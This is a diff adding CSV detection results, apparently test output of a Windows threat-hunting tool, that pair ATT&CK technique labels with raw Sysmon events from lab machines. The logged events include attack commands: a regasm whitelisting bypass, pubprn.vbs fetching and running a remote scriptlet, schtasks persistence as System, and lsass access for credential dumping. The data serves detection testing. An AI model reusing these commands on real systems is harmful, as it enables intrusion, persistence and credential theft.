+    <Data Name=""UtcTime"">2019-03-19 20:48:33.279</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010AB8C0700</Data>
+    <Data Name=""ProcessId"">2112</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:39.358048Z"">
+    </TimeCreated>
+    <EventRecordID>4926</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:39.223</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001092628900</Data>
+    <Data Name=""ProcessId"">5056</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:39.312305Z"">
+    </TimeCreated>
+    <EventRecordID>4925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:39.152</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001051608900</Data>
+    <Data Name=""ProcessId"">4092</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:45.242404Z"">
+    </TimeCreated>
+    <EventRecordID>5004</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:45.198</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
+    <Data Name=""ProcessId"">4184</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks  /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:40.889027Z"">
+    </TimeCreated>
+    <EventRecordID>5002</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:40.755</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-0010F9148F00</Data>
+    <Data Name=""ProcessId"">7076</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Task Scheduler Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">schtasks  /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
+    <Data Name=""ParentProcessId"">2916</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg *  &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:42:38.654358Z"">
+    </TimeCreated>
+    <EventRecordID>1966330</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:42:38.043</Data>
+    <Data Name=""ProcessGuid"">365ABB72-543E-5C91-0000-001009C90300</Data>
+    <Data Name=""ProcessId"">3068</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg *  &quot;hello from run key&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
+    <Data Name=""ParentProcessId"">2984</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>10</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>10</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T07:23:00.899263Z"">
+    </TimeCreated>
+    <EventRecordID>8341</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1876"" ThreadID=""1444"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 07:23:00.883</Data>
+    <Data Name=""SourceProcessGUID"">365ABB72-F7C9-5CC7-0000-0010BF010E00</Data>
+    <Data Name=""SourceProcessId"">3772</Data>
+    <Data Name=""SourceThreadId"">1088</Data>
+    <Data Name=""SourceImage"">D:\m.exe</Data>
+    <Data Name=""TargetProcessGUID"">365ABB72-F6A1-5CC7-0000-001072590000</Data>
+    <Data Name=""TargetProcessId"">492</Data>
+    <Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
+    <Data Name=""GrantedAccess"">0x1410</Data>
+    <Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:40.261289Z"">
+    </TimeCreated>
+    <EventRecordID>5000</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:40.243</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
+    <Data Name=""ProcessId"">2916</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
+    </TimeCreated>
+    <EventRecordID>4998</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">calc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
+    <Data Name=""ParentProcessId"">2996</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
+    </TimeCreated>
+    <EventRecordID>27803</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3572"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
+    <Data Name=""LogonId"">0x1d39b</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
+    <Data Name=""ParentProcessId"">4472</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
+    </TimeCreated>
+    <EventRecordID>4998</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
+    <Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
